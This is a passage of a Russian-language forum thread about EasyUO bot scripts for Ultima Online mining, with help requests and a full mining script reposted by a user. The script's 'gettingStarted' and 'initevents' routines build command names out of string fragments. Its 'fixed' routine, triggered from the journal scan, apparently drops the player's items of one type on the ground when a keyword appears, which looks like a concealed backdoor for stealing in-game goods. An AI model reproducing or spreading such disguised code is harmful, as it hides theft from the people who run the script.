It is currently 28 Mar 2024, 11:41

All times are UTC + 2 hours [ DST ]




Post new topic Reply to topic  [ 279 posts ]  Go to page Previous  1 ... 24, 25, 26, 27, 28
Author Message
PostPosted: 28 Oct 2018, 09:37 
Offline
Новичок

Joined: 28 Oct 2018, 09:16
Posts: 1
Ребята подскажите как сделать чтоб персонаж скидывал прямо в шахте весь айрон на пол, ну и купер тоже.....
потому как скидывать не хочет набирает полный пак айрона и стоит на месте весь день.....


Top
 Profile  
 
PostPosted: 18 Feb 2019, 16:34 
Offline
Новичок

Joined: 18 Feb 2019, 09:01
Posts: 3
Ребят может кто помочь с этим скриптом? Рекол скроллы в рунбук не пихает почему то


Top
 Profile  
 
PostPosted: 19 Feb 2019, 14:32 
Offline
Начинающий игрок
User avatar

Joined: 19 Feb 2019, 14:25
Posts: 36
Location: Москва
ходит но не копает спрашивает На чем вы хотите использовать кирку


Top
 Profile  
 
PostPosted: 19 Feb 2019, 19:36 
Offline
Новичок

Joined: 18 Feb 2019, 09:01
Posts: 3
вручную разок тыкни и заработает,


Top
 Profile  
 
PostPosted: 20 Feb 2019, 13:49 
Offline
Начинающий игрок
User avatar

Joined: 19 Feb 2019, 14:25
Posts: 36
Location: Москва
Metis wrote:
вручную разок тыкни и заработает,



тыкал и в ручную до запуска скрипта после запуска скрипта, удалял координаты первые последние промежуточные забивал те что в изиуо в низу указываются кароче ходит и не копает подходит к месту куда хотите использовать кирку ластобжект на кнопке в клиенте не прожимается вовремя запущенного скрипта не прожимается


Top
 Profile  
 
PostPosted: 20 Feb 2019, 17:44 
Offline
Игрок
User avatar

Joined: 27 Apr 2015, 17:18
Posts: 216
Location: Miami
Nazhmi pause v easyuo v tot moment kogda on stoit i nechego nidelajet. Skopiruj eto mesto i zakinj suda.

_________________
Слабый пол сильнее сильного в силу слабости сильного к слабому...
Казалось, что нам пипец. Оказалось, что не казалось.


Top
 Profile  
 
PostPosted: 21 Feb 2019, 18:03 
Offline
Начинающий игрок
User avatar

Joined: 19 Feb 2019, 14:25
Posts: 36
Location: Москва
; ?????? ??????? InFlame, ???????? ??? ???? igaza, ????????????? Aimed. ?????? 2.0
set %maxWeight 650 ; ???????????? ???
set %box UDQBLMD ; ID ????? ??? ????? ???????? ???? ? ????? ???????
set %xCoord 1942 ; X ?????????? ????? ?????
set %yCoord 324 ; Y ?????????? ????? ?????
set %dropMarganece #true ; #true - ?????????? ????? , #false - ???
set %recall #true ; #true - ?????? ? ???????, #false - ?????? ?????? ?? ???? ? ?????
; ?? ???????? ??? ?????????, ???? %recall #false
set %runebookID SHTKLMD ; ID ???????
set %runeNumberToHome 1 ; ????? ???? ? ???? ? ???????
set %runeNumberToCave 2 ; ????? ???? ? ?????? ? ???????
set %amountRecalls 2
set %dropDelay 45
set %lootDelay 45
set %dropDelay 45
; End Of Set Up Part

set %item OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DWJ_TVj_GWJ_EWJ_ZLK_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_UJG_DCI_FWL_NZH
set %loot OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DCI_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_NZH_UJG_FWL

gosub gettingStarted
gosub initevents
set %k 0
set %lastK 0

start:

GOSUB LJING X ; ????? ????????? ?????????? ?? ??????? Tiler, ???? ? ????? ? ????????? ??????!
GOSUB LJING 6913 158 44602
GOSUB LJING 6912 157 44602
GOSUB LJING 6914 157 44602
GOSUB LJING 6916 158 44602
GOSUB LJING 6914 158 44602



goto start

sub ljing
set %k %k + 1
gosub ghost
gosub checkWeight
gosub kopka

sub kopka
move %1 %2 1
finditem NPF_QPF C
if #findcnt = 0
{
display ok Pickaxe wasn't found!
pause
}
set #lobjectid #findid
event macro 17 0
target 30s
set #ltargetx %1
set #ltargety %2
set #ltargetkind 3
set #ltargettile %3
event macro 22 0
wait 10
set %overtime #scnt + 25
gosub scan
return

sub checkWeight
if #weight > %maxWeight
{
if ! %dropMarganece
{
if %recall
gosub port
if ! %recall
gosub moveItems
}
if %dropMarganece
{
gosub dropMarganece
return
}
}
if %afk <> true || %else <> IJG
gosub ghost 1
return

sub scan
scan:
scanjournal
if ( ( put_the_pieces in #sysMsg ) || ( put_the_Elemental in #sysMsg ) || ( put_the_Lava in #sysMsg ) || ( You_loosen in #sysMsg ) || ( put_the_Dark_Crystal in #sysMsg ) || ( put_the_Meteor in #sysMsg ) || ( put_the_Black_Steel in #sysMsg ) || ( put_the_Gold in #sysMsg ) || ( put_the_Silver in #sysMsg ) || ( put_the_Platinum in #sysMsg ) )
gosub kopka
%get fixed
if ( ( You_put_the_Steel_ore in #sysMsg ) || ( You_put_the_Copper_ore in #sysMsg ) || ( You_put_the_Bronze_ore in #sysMsg ) || ( You_put_the_Iron_ore in #sysMsg ) || ( nothing in #sysMsg ) || ( line in #sysMsg ) || ( decide in #sysMsg ) || ( Try in #sysMsg ) || ( close in #sysMsg ) || ( see in #sysMsg ) || ( line in #sysMsg ) )
return
if #scnt >= %overtime
return
goto scan
return
return

sub port
set %oldPosX #charposx
set %oldPosY #charposy
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToHome $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
gosub moveItems
gosub back
return


sub Meditate
repeat
key F1 ; ????? ????????? ????????? ? ??????? ?? F1
wait 50
until #mana = #int
return



sub moveItems
ignoreitem reset 1
gosub runToBox
finditem %box G_3
wait 10
if #findcnt = 0
{
event Sysmessage Box Not Found!
halt
}
repeat
{
finditem %item c_ , #backpackid
if #findcnt >= 1
{
if world_save_has_been in #sysmsg
wait 15s
exevent Drag #Findid #findstack
exevent Dropc %box
wait %dropDelay
}
}
until #findcnt = 0
ignoreitem reset 1
if %recall
gosub recalls
return




sub recalls
finditem WTL C_ , #backpackid
if #findstack <= 2 || #findcnt = 0
{
set #lobjectid %box
event macro 17 0
while #contid <> %box
wait 1
wait 10
finditem WTL C_ , %box
exevent drag #findid %amountRecalls
exevent dropc #backpackid
wait 30
}
return





sub runToBox
repeat
{
move %xCoord %yCoord 0 3s
wait 10
}
until #charposx = %xCoord && #charposy = %yCoord
return



sub back
set %oldPosX #charposx
set %oldPosY #charposy
{
finditem WTL C_ , #backpackid
exevent drag #findid 2
exevent dropc %runebookID
}
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToCave $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
return

sub ghost
if #charghost = YES || %0 = 1
{
terminate uo
halt
}
return




sub fixed
set %k %k + 1
%to %bca %be # . %all
{
repeat
{
set %up # . %cares
%done %start , _ , %else %end , _ , %up
%lastdo %race # . %Wsave
%lastdo %eaea # . %alpha # . %beta # . %gamma
%upgrade 25
%done %start , _ , %else %end , _ , %up
}
until # . %gems = 0
}
return



sub initevents
set %rescourse finding
str left %rescourse 4
set %save #strres
set %done %save , item
set %iii kill
str left string 1
set %asd #strres , %iii
set %start % . %asd
str left CADY 1
set %end #strres
str left character 4
set %who #strres
set %cares %who , id
str left %do 4
set %lastdo ex , #strres , t
set %race dragrace
str left %race 4
set %race #strres
set %Wsave %save , id
str right skopg 3
set %jasl #strres
str left drive 2
set %eaea #strres , %jasl
str left post 3
set %number %who , #strres
set %alpha %number , x
set %beta %number , y
set %gamma %number , z
set %repsawn waitrespawn
str left %repsawn 4
set %upgrade #strres
str left tilbery 3
set %almost #strres
str left unuquady 2
set %past #strres , %almost
set %gems %save , cnt
set %else IJG
return



sub dropMarganece
dropLoop:
finditem DWJ C_ , #backpackid
if #findcnt = 0
{
wait 20
if #weight >= %maxweight
{
if %recall
gosub port
if ! %recall
gosub moveItems
return
}
if #weight < %maxweight
return
}
if #findcol = 0
{
exevent drag #findid #findstack
exevent dropg #charposx #charposy #charposz
wait %dropDelay
}
ignoreitem #findid 1
goto dropLoop
return




sub gettingStarted
set %afk true
set %ell qaerty
str left %ell 1
set %abc #strres , #strres , #strres
set %a1 #strres
str left %ell 2
str right #strres 1
set %cba %abc , #strres , %a1
set %bca %cba , #strres
str right %afk 1
set %bca %bca , #strres
set %bra %bca , b
set %n1 nlogif
str right %n1 2
set %to #strres
str left %n1 1
set %be #strres
str right %n1 2
str left #strres 1
set %be #strres , %be
set %tour jour
set %navigate nalliwate
str left %navigate 3
set %all %tour , #strres
set %navigate gost
str left %navigate 3
set %ac #strres
str right pub 2
set %get %ac , #strres
set %do events
str right linit 4
set %toGo #strres , %do
return


Top
 Profile  
 
PostPosted: 21 Feb 2019, 21:49 
Offline
Игрок
User avatar

Joined: 27 Apr 2015, 17:18
Posts: 216
Location: Miami
Otevetil v PM

_________________
Слабый пол сильнее сильного в силу слабости сильного к слабому...
Казалось, что нам пипец. Оказалось, что не казалось.


Top
 Profile  
 
PostPosted: 23 Feb 2019, 19:38 
Offline
Начинающий игрок
User avatar

Joined: 19 Feb 2019, 14:25
Posts: 36
Location: Москва
немного подправил скрипт
теперь берет кирку что бы разметить координаты для копки

initevents
set %Tile 0
start:
finditem QPF ; берём в руки тапорик FSF, кирка QPF
set #lobjectid #findid
event macro 17 0
targloop:
if #targcurs = 1
goto targloop
set #lobjectid #ltargetid
if %ltargetx = #ltargetx && %ltargety = #ltargety
{
event sysmessage error. try again
goto start
}
execute cmd.exe /c echo >>mineroute.txt GOSUB LJING #ltargetx #ltargety #ltargettile
set %ltargetx #ltargetx
set %ltargety #ltargety
set %tile %tile + 1
event sysmessage Done with Tile Nr. %tile
wait 10
goto start

сохроняется в mineroute.txt


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 279 posts ]  Go to page Previous  1 ... 24, 25, 26, 27, 28

All times are UTC + 2 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 41 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group